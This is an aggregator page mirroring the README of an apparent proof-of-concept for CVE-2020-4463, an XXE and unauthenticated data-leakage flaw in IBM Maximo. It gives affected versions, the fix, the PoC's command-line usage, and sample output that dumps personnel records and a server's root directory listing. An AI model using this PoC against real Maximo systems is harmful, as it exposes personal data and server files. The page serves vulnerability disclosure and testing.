GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Ibonok → CVE-2020-4463

Ibonok / CVE-2020-4463

Licence: other
IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)

Programming Languages

python
139335 projects - #7 most used programming language

Labels

securitysecurity-vulnerabilityibmibm-maximocve-2020-4463

Projects that are alternatives of or similar to CVE-2020-4463

exploits
Some of my public exploits
Stars: ✭ 50 (+21.95%)
Mutual labels:  security-vulnerability
resilient-python-api
Python Library for the IBM SOAR REST API, a Python SDK for developing Apps for IBM SOAR and more...
Stars: ✭ 29 (-29.27%)
Mutual labels:  ibm
platform-services-go-sdk
Go client library for IBM Cloud Platform Services
Stars: ✭ 14 (-65.85%)
Mutual labels:  ibm
ascii-art
ASCII art images for Neofetch (and beyond)
Stars: ✭ 27 (-34.15%)
Mutual labels:  ibm
NetworkAlarm
A tool to monitor local network traffic for possible security vulnerabilities. Warns user against possible nmap scans, Nikto scans, credentials sent in-the-clear, and shellshock attacks. Currently supports live monitoring and network capture (pcap) scanning.
Stars: ✭ 17 (-58.54%)
Mutual labels:  security-vulnerability
openshift101
OpenShift 101 on IBM Cloud tutorial: https://ibm.github.io/openshift101/
Stars: ✭ 27 (-34.15%)
Mutual labels:  ibm
hyperion
The SoftDevLabs (SDL) version of the Hercules 4.x Hyperion System/370, ESA/390, and z/Architecture Emulator
Stars: ✭ 149 (+263.41%)
Mutual labels:  ibm
training-application-security
This repository for training application security.
Stars: ✭ 25 (-39.02%)
Mutual labels:  security-vulnerability
punch-q
👊 A small utility to play with IBM MQ
Stars: ✭ 49 (+19.51%)
Mutual labels:  ibm
moodlescan
Tool for scan vulnerabilities in Moodle platforms
Stars: ✭ 54 (+31.71%)
Mutual labels:  security-vulnerability
icp-ce-on-linux-containers
Multi node IBM Cloud Private Community Edition 3.2.x w/ Kubernetes 1.13.5 in a Box. Terraform, Packer and BASH based Infrastructure as Code script sets up a multi node LXD cluster, installs ICP-CE and clis on a metal or VM Ubuntu 18.04 host.
Stars: ✭ 52 (+26.83%)
Mutual labels:  ibm
omxware-getting-started
Examples to get started with IBM Functional Genomics Platform
Stars: ✭ 13 (-68.29%)
Mutual labels:  ibm
mq-java-exporter
Exporter for IBM MQ metrics https://prometheus.io/
Stars: ✭ 19 (-53.66%)
Mutual labels:  ibm
coax
Tools for connecting to real IBM 3270 type terminals
Stars: ✭ 29 (-29.27%)
Mutual labels:  ibm
terraform-module-icp-deploy
This Terraform module can be used to deploy IBM Cloud Private on any supported infrastructure vendor. Tested on Ubuntu 16.04 and RHEL 7 on SoftLayer, VMware, AWS and Azure.
Stars: ✭ 13 (-68.29%)
Mutual labels:  ibm
Model-M-Type-C
A modern yet simple Model M replacement controller
Stars: ✭ 67 (+63.41%)
Mutual labels:  ibm
oec
IBM 3270 terminal controller - a replacement for the IBM 3174
Stars: ✭ 29 (-29.27%)
Mutual labels:  ibm
nlc-email-phishing
Detect email phishing with Watson Natural Language Classifier
Stars: ✭ 26 (-36.59%)
Mutual labels:  ibm
Quantum-Computing-Resources
This repository contains the best resources for learning practical quantum computing. This repository will be updated frequently.
Stars: ✭ 60 (+46.34%)
Mutual labels:  ibm
bWAPP
bWAPP latest modified for PHP7
Stars: ✭ 30 (-26.83%)
Mutual labels:  security-vulnerability
View All Similar Projects ➔

IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)

IBM Maximo Asset Management is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.

Base Score: 8.2

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

Affected Core Components

IBM Maximo Asset Management 7.6.0
IBM Maximo Asset Management 7.6.1
IBM Maximo Asset Management all Verisons befor 7.6.0

Affected Products

Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

Patched in Version

Fixed Version: Maximo Asset Management 7.6.1.2
prior Versions: See workaround (link below)

Links:

PoC

Here now the PoC for the vulnerability. Not only the versions mentioned by IBM are vulnerable. All versions befor version 7.6.0 can be also vulnerable.

The PoC checks 2 vulnerabilities that might be present on the system. A data leakage vulnerability that can be exploited if no authentication is implemented and the XXE vulnerability that can be exploited if a certain value (mxe.int.resolvexmlextentity=0) is not set in the configuration.

Example

Usage

python3 CVE-2020-4463.py --help
usage: CVE-2020-4463.py [-h] [-x [XXE]] [-d [DATALEAK]] [--url [URL]]

CVE-2020-4463 PoC Data Leakage and XXE

optional arguments:
  -h, --help            show this help message and exit
  -x [XXE], --xxe [XXE]
                        XXE (Linux/Windows)
  -d [DATALEAK], --dataleak [DATALEAK]
                        Data Leakage REST request MXPERSON. May take a long
                        time.
  --url [URL]           Target URL http://, https://

If you get following response, both vulnerabilities are not present.

Error 500: BMXAA1268E - No user credentials.

Data Leakage

May take a long time if the database contains many entries.

CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -d

<?xml version="1.0" encoding="UTF-8"?>
<QueryMXPERSONResponse xmlns="http://www.ibm.com/maximo" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    creationDateTime="2020-11-16T10:42:49+01:0 0" transLanguage="EN" baseLanguage="EN"
    messageID="6927296.160551977018422092" maximoVersion="7 6 20170418-0100 V7608-61" rsStart="0" rsTotal="4374"
    rsCount="4374">
    <MXPERSONSet>
        <PERSON>
            <ADDRESSLINE1></ADDRESSLINE1>
            <CITY></CITY>
            <CLASSSTRUCTUREID></CLASSSTRUCTUREID>
            <COUNTRY></COUNTRY>
            <C_DESCRIZIONE></C_DESCRIZIONE>
            <C_MATRICOLA></C_MATRICOLA>
            <C_QUALIFICA></C_QUALIFICA>
            <FIRSTNAME>Lxxxxxxx</FIRSTNAME>
            <LANGUAGE>IT</LANGUAGE>
            <LASTNAME>xxxxxx</LASTNAME>
            <PERSONID>Lxxxxxxx</PERSONID>
            <POSTALCODE></POSTALCODE>
            <PRIMARYEMAIL>[email protected]</PRIMARYEMAIL>
            <PRIMARYPHONE></PRIMARYPHONE>
            <STATEPROVINCE></STATEPROVINCE>
            <STATUS maxvalue="ACTIVE">ACTIVE</STATUS>
            <TITLE></TITLE>
            <USERNOTFTYPE></USERNOTFTYPE>
            <EMAIL>
                <EMAILADDRESS>[email protected]</EMAILADDRESS>
            </EMAIL>
        </PERSON>

XXE

CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -x          

Error 500: BMXAA4160E - A major exception has occurred. Check the system log to see if there are any companion errors logged. Report this error to your system administrator.
	/c: &#40;No such file or directory&#41;
Error 500: For input string: &quot;bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost&#43;found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
&quot;
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].